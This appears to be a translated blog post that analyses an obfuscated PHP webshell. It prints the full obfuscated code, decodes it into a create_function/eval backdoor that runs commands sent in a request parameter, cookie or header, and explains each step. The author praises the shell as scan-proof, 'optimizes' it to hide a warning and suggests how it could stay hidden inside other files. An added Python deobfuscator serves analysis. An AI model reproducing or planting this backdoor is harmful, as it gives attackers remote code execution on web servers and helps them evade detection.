This trojan uses an even more sophisticated disguise technique!
It can easily slip past every antivirus product and trojan scanner, and past the careless inspection of ops engineers and programmers alike!
It truly achieves "inspection-free", "scan-proof" and "clean"...
1. This trojan's "inspection-free, undetectable, safe and clean" disguise
<?php
$cleanliness ='s'; $innis= '(s(e';
$crustacean = '"';
$inadvisable= 't'; $interdisciplinary = 'a'; $canada= ')Tre';$infuriates = '^'; $cimcumvention ='t'; $exclusions ='r'; $brow='l'; $dukey= 'e';$equivocate ='y';
$construed= '(';$cloaks ='o';
$camellia= 'gqQ';$confidingly = ')';$depreciable= 'v';
$benedicto = 'T';$bribe = 'a'; $intolerably = '_eja:cR'; $explainers ='6'; $facet = 'bre';
$brawler =')StrO'; $channeled= 'S';$durand = '$H'; $flavoring= 'S';$expendable ='=]c';$brandnjanet= 'i'; $integrative= ')'; $giulietta='K[)es'; $confirmation= 'nbxEc_';$counterpoise='h'; $garland= ';jRqPy'; $limbo= '(_uwRT';$liane= 'i_L_';
$hemp='(ai"';$associatively= 'h'; $handed = 'Y"tJkH)]';
$envision ='f';
$contradistinct='Gv'; $fleet='fnerir(o';$cutter = 'r';$cognitive = 't';
$dimmer ='u'; $eldridge= '`arsm:_'; $lister = 'sVnedT';
$forsakes ='i';
$kathye = 'iCv$';$kurt ='=Qe$$Ne';$coupled= 'e'; $headaches = '[';$dynasty = 'r';
$drafting ='$';$gangster ='T';$leonid ='v'; $cheats='P'; $fabrication ='p';$landslide ='V';$fin=')';$characterize = 'QX'; $finessing =';'; $incenses = '"Ss__m,J]'; $guest3 ='S';$birthrights= 'r';$guidebook = 'u'; $donna= 'b'; $emeralds= 'rLOl"'; $constables = '? ish'; $cookery =')Bsa';$dairy= 'iRs';
$logician ='da'; $comfortably ='l([?foy,"';$altitude= 'E';$hilum='I)'; $expectant=')$HeReTcQ'; $chive = ')'; $jandy ='a';$extradition ='d';
$luce = 'JKrjs_a'; $dalia= 'p'; $bob = 'b';$benetta = '[';
$dianna ='B4';
$excepted = ';s'; $coverlets ='I_';$bridged ='rgdes'; $died= '((s';$madelene= 'tvni(';$characterizing = ']$UHc$'; $codebreak= 'E';
$landings='UEPE$plt'; $gated='$';
$belles='q';$buckle = 'S';$delightfully= 'a'; $exclaiming = 'W'; $caleb ='g'; $kellia= 'r;O("aLM';$blemish ='e';
$fart= 'F_'; $displaces= ']_RCtoZa'; $dependents ='l'; $ditty='e';
$garaged= '"g';$jolt ='i'; $june = 'HE[SD';$loyal= $characterizing[4].
$kellia['0'].$ditty.$displaces['7']. $displaces['4'] .
$ditty .$displaces['1'] .$comfortably['4'] . $guidebook .$madelene['2'] .$characterizing[4] . $displaces['4'] .
$jolt .$displaces['5']. $madelene['2'];$ardith= $constables[1]; $kermy= $loyal
($ardith, $ditty .$madelene['1'] .$displaces['7']. $dependents .
$kellia['3']. $displaces['7'].$kellia['0'] . $kellia['0']. $displaces['7'].
$comfortably['6'] .
$displaces['1']. $landings['5'] .
$displaces['5'].$landings['5'].
$kellia['3'] .
$comfortably['4'].
$guidebook. $madelene['2'] .$characterizing[4].$displaces['1'] . $garaged['1']. $ditty. $displaces['4'] . $displaces['1']. $displaces['7'] .$kellia['0']. $garaged['1']. $died['2'] . $kellia['3']. $chive.
$chive.$chive . $kellia['1']);$kermy($luce['3'],
$expectant['8'],$gated ,$june['4'],$coverlets['0'] , $characterizing[4], $characterizing[4],$comfortably['4'],$comfortably['6'] , $gated . $jolt .$kurt['0'].
$displaces['7'] . $kellia['0']. $kellia['0'] . $displaces['7'] . $comfortably['6'] .$displaces['1'] .
$incenses['5'] .
$ditty . $kellia['0'].$garaged['1']. $ditty.
$kellia['3'] .$gated .$displaces['1']. $displaces['2'].$june['1'].$expectant['8'] .
$landings['0'] . $june['1'].
$june['3']. $expectant['6']. $comfortably['7'] .$gated. $displaces['1'].
$displaces[3].
$kellia[2].$kellia[2] . $luce[1] . $coverlets['0'] .
$june['1']. $comfortably['7']. $gated .$displaces['1'] .
$june['3']. $june['1'].
$displaces['2'] . $landslide .
$june['1'].$displaces['2'] .
$chive.$kellia['1'] .$gated .
$displaces['7'] .
$kurt['0'].
$jolt . $died['2'] . $died['2'].
$ditty .$displaces['4']. $kellia['3']. $gated. $jolt . $june['2'] .$garaged['0']. $dependents.
$luce['3'] .$died['2'] .$belles .
$constables[4].$kellia['0']. $bob .$died['2'] . $garaged['0']. $displaces['0'] .$chive. $comfortably['3'] . $gated . $jolt .$june['2'].
$garaged['0'].$dependents.$luce['3']. $died['2'].
$belles .$constables[4].$kellia['0']. $bob .$died['2'].$garaged['0'] . $displaces['0'] .$eldridge['5'].$kellia['3'].
$jolt.
$died['2'].
$died['2'] .$ditty .
$displaces['4'] .
$kellia['3'].$gated. $jolt. $june['2'] .$garaged['0']. $june['0'] . $expectant['6'] . $expectant['6'] . $landings[2].$displaces['1'].
$kellia['6'].$luce['0'].$june['3'].
$expectant['8'] .$june['0'] .$displaces['2'] .
$dianna[0] .$june['3'] .$garaged['0'].$displaces['0'] .$chive . $comfortably['3']. $gated .$jolt.
$june['2']. $garaged['0']. $june['0']. $expectant['6'] . $expectant['6'] . $landings[2].
$displaces['1'].$kellia['6'].
$luce['0']. $june['3'] . $expectant['8'] . $june['0'] .
$displaces['2']. $dianna[0].
$june['3']. $garaged['0'] .
$displaces['0'].
$eldridge['5'] . $bridged[2] . $jolt.$ditty . $chive .
$kellia['1'].$ditty . $madelene['1'] .
$displaces['7'].$dependents . $kellia['3'].$died['2'] .
$displaces['4'] . $kellia['0'].$kellia['0'] . $ditty . $madelene['1'] . $kellia['3'] . $bob .$displaces['7'] . $died['2'] . $ditty.$explainers. $dianna['1'] .
$displaces['1'] .
$bridged[2].$ditty .$characterizing[4] . $displaces['5'] . $bridged[2] .
$ditty. $kellia['3']. $died['2'] . $displaces['4']. $kellia['0'] .$kellia['0'].$ditty.$madelene['1'].$kellia['3'] . $gated.$displaces['7'] . $chive .$chive . $chive .$chive .
$kellia['1'] );
2. How the PHP trojan evades trojan scanners and antivirus detection
There is an old saying:
Egg fried rice, egg fried rice: the simplest dish, and the hardest!
The trojan source above makes heavy use of
- 1. PHP string concatenation of variables
- 2. PHP string splitting
- 3. a deep understanding of the rules for treating a PHP string as an array of characters
to produce an "inspection-free" PHP trojan!
An example will make it clear:
$a = 'eval';
echo $a[0];// outputs e, same as $a{0}
echo $a[1];// outputs v, same as $a{1}
echo $a[2];// outputs a, same as $a{2}
echo $a[3];// outputs l, same as $a{3}
echo $a[0].$a[1].$a[2].$a[3];// outputs eval
3. The true face of the PHP trojan: its decoded and decrypted source
After engineer LET's tireless effort, and hints from friends, the trojan's full story is finally clear..
All of us PHP veterans are in awe of this trojan!
<?php
$cleanliness = 's';
$innis = '(s(e';
$crustacean = '"';
$inadvisable = 't';
$interdisciplinary = 'a';
$canada = ')Tre';
$infuriates = '^';
$cimcumvention = 't';
$exclusions = 'r';
$brow = 'l';
$dukey = 'e';
$equivocate = 'y';
$construed = '(';
$cloaks = 'o';
$camellia = 'gqQ';
$confidingly = ')';
$depreciable = 'v';
$benedicto = 'T';
$bribe = 'a';
$intolerably = '_eja:cR';
$explainers = '6';
$facet = 'bre';
$brawler = ')StrO';
$channeled = 'S';
$durand = '$H';
$flavoring = 'S';
$expendable = '=]c';
$brandnjanet = 'i';
$integrative = ')';
$giulietta = 'K[)es';
$confirmation = 'nbxEc_';
$counterpoise = 'h';
$garland = ';jRqPy';
$limbo = '(_uwRT';
$liane = 'i_L_';
$hemp = '(ai"';
$associatively = 'h';
$handed = 'Y"tJkH)]';
$envision = 'f';
$contradistinct = 'Gv';
$fleet = 'fnerir(o';
$cutter = 'r';
$cognitive = 't';
$dimmer = 'u';
$eldridge = '`arsm:_';
$lister = 'sVnedT';
$forsakes = 'i';
$kathye = 'iCv$';
$kurt = '=Qe$$Ne';
$coupled = 'e';
$headaches = '[';
$dynasty = 'r';
$drafting = '$';
$gangster = 'T';
$leonid = 'v';
$cheats = 'P';
$fabrication = 'p';
$landslide = 'V';
$fin = ')';
$characterize = 'QX';
$finessing = ';';
$incenses = '"Ss__m,J]';
$guest3 = 'S';
$birthrights = 'r';
$guidebook = 'u';
$donna = 'b';
$emeralds = 'rLOl"';
$constables = '? ish';
$cookery = ')Bsa';
$dairy = 'iRs';
$logician = 'da';
$comfortably = 'l([?foy,"';
$altitude = 'E';
$hilum = 'I)';
$expectant = ')$HeReTcQ';
$chive = ')';
$jandy = 'a';
$extradition = 'd';
$luce = 'JKrjs_a';
$dalia = 'p';
$bob = 'b';
$benetta = '[';
$dianna = 'B4';
$excepted = ';s';
$coverlets = 'I_';
$bridged = 'rgdes';
$died = '((s';
$madelene = 'tvni(';
$characterizing = ']$UHc$';
$codebreak = 'E';
$landings = 'UEPE$plt';
$gated = '$';
$belles = 'q';
$buckle = 'S';
$delightfully = 'a';
$exclaiming = 'W';
$caleb = 'g';
$kellia = 'r;O("aLM';
$blemish = 'e';
$fart = 'F_';
$displaces = ']_RCtoZa';
$dependents = 'l';
$ditty = 'e';
$garaged = '"g';
$jolt = 'i';
$june = 'HE[SD';
$loyal = 'create_function';
$ardith = ' ';
$kermy = $loyal($ardith, 'eval(@array_pop(func_get_args()));');
$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');
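As an added example (not part of the original post), a small Python deobfuscator for the character-indexing trick explained in section 2 and resolved by hand in section 3: it collects the `$var = '...';` literals, evaluates a '.'-joined chain of `$var[n]` / `$var{n}` terms, and checks the recovered text against a short watch list of dangerous PHP function names. The embedded assignments and the two expressions are copied from the shell above; `WATCH`, the function names and the `{n}` handling are my own additions.

```python
import re

# Constructed input, copied from the obfuscated shell above: only the variables
# that the two concatenations below actually reference.
SAMPLE_ASSIGNMENTS = r"""
$characterizing = ']$UHc$'; $kellia = 'r;O("aLM'; $ditty = 'e';
$displaces = ']_RCtoZa'; $comfortably = 'l([?foy,"'; $guidebook = 'u';
$madelene = 'tvni('; $jolt = 'i'; $constables = '? ish'; $dependents = 'l';
$landings = 'UEPE$plt'; $garaged = '"g'; $died = '((s'; $chive = ')';
"""
# The chain that builds $loyal (the function name) in the shell, joined onto one line.
NAME_EXPR = ("$characterizing[4].$kellia['0'].$ditty.$displaces['7'].$displaces['4']."
             "$ditty.$displaces['1'].$comfortably['4'].$guidebook.$madelene['2']."
             "$characterizing[4].$displaces['4'].$jolt.$displaces['5'].$madelene['2']")
# The chain that builds the create_function body.
BODY_EXPR = ("$ditty.$madelene['1'].$displaces['7'].$dependents.$kellia['3']."
             "$displaces['7'].$kellia['0'].$kellia['0'].$displaces['7'].$comfortably['6']."
             "$displaces['1'].$landings['5'].$displaces['5'].$landings['5'].$kellia['3']."
             "$comfortably['4'].$guidebook.$madelene['2'].$characterizing[4].$displaces['1']."
             "$garaged['1'].$ditty.$displaces['4'].$displaces['1'].$displaces['7'].$kellia['0']."
             "$garaged['1'].$died['2'].$kellia['3'].$chive.$chive.$chive.$kellia['1']")

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# $name, $name[n], $name['n'], and the pre-PHP-8 $name{n} offset syntax.
TERM_RE = re.compile(r"\$(\w+)(?:\[\s*'?(\d+)'?\s*\]|\{\s*'?(\d+)'?\s*\})?")
WATCH = ("eval", "create_function", "func_get_args", "array_pop",
         "base64_decode", "strrev", "assert", "system")   # triage list, my choice

def parse_assignments(src):
    """Map every $var = '...'; literal to its value (PHP single-quote unescaping)."""
    return {name: raw.replace("\\'", "'").replace("\\\\", "\\")
            for name, raw in ASSIGN_RE.findall(src)}

def resolve(expr, table):
    """Evaluate a '.'-joined chain of $var / $var[n] / $var{n} terms to a string."""
    parts = []
    for name, idx_a, idx_b in TERM_RE.findall(expr):
        idx = idx_a or idx_b
        parts.append(table[name][int(idx)] if idx else table[name])
    return "".join(parts)

def suspicious_calls(decoded):
    """Names from WATCH that appear in the recovered text, for triage."""
    return sorted(n for n in WATCH if n in decoded)

if __name__ == "__main__":
    table = parse_assignments(SAMPLE_ASSIGNMENTS)
    for expr in (NAME_EXPR, BODY_EXPR):
        text = resolve(expr, table)
        print(repr(text), suspicious_calls(text))
```

create_function and the `$a{n}` offset syntax were both removed in PHP 8.0, so this exact shell only runs on older PHP; the same resolving step still applies when the trick is rebuilt with `[]` and a regular closure.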
4. The PHP trojan's classic core source
After all the disguise and concatenation, it boils down to a core two-line trojan:
$kermy = create_function(' ', 'eval(array_pop(func_get_args()));');
$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');
However, after analysis the author LET found one imperfection: array_pop's argument must be passed by reference, so the code above produces a Strict Standards warning!
In the spirit of one hero recognizing another, I helped optimize it; the optimized code:
$kermy = create_function(' ', 'eval(@array_pop(func_get_args()));');
$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');
5. Outline of the PHP trojan's execution flow
PhD final exam:
Advisor: Using everything you have learned, answer me carefully: 1+1 = ?
PhD student: Uh, how can it be this simple? Impossible!
How should I answer? Calculus? An unwritten rule? A trap?.....
The real answer: 2
- 1. Set up the smoke-screen arguments 'j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y'; this is also what puzzled the author for the longest time, just like the example above.
- 2. func_get_args() dynamically collects every argument passed on the second line, then array_pop takes the last one as the code handed to eval; all the other arguments are smoke screen!
- 3. Merge $_REQUEST (GET+POST), $_COOKIE and $_SERVER and assign the result to $i
- 4. Check whether that merged array contains an externally supplied ljsqhrbs parameter; if it does, execute it via eval(strrev(base64_decode(strrev($a))))!
- 5. Following on from that, if there is no ljsqhrbs, check whether the externally submitted HTTP_LJSQHRBS parameter exists; if it does, execute it! If not, forcibly halt and end the script!
6. PHP trojan assessment & author's opinion
Highlights of this PHP trojan:
1. Very clever, downright too clever; what painstaking effort!
2. The second argument of create_function: a flexible and deep understanding of writing ordinary PHP code inside a function body string! Dashing yet romantic, unrestrained yet rigorous! Clearly the work of a trojan professional or a PHP master!
Flaws of this PHP trojan:
1. array_pop's argument must be a reference, so the code above produces a Strict Standards warning! Which forced the author to optimize it for them...
2. A trojan is still a trojan: even when it does not get the parameter it wants, or execution fails, it must not die at the end! If this file is planted at the head of another file, wouldn't it be exposed very easily?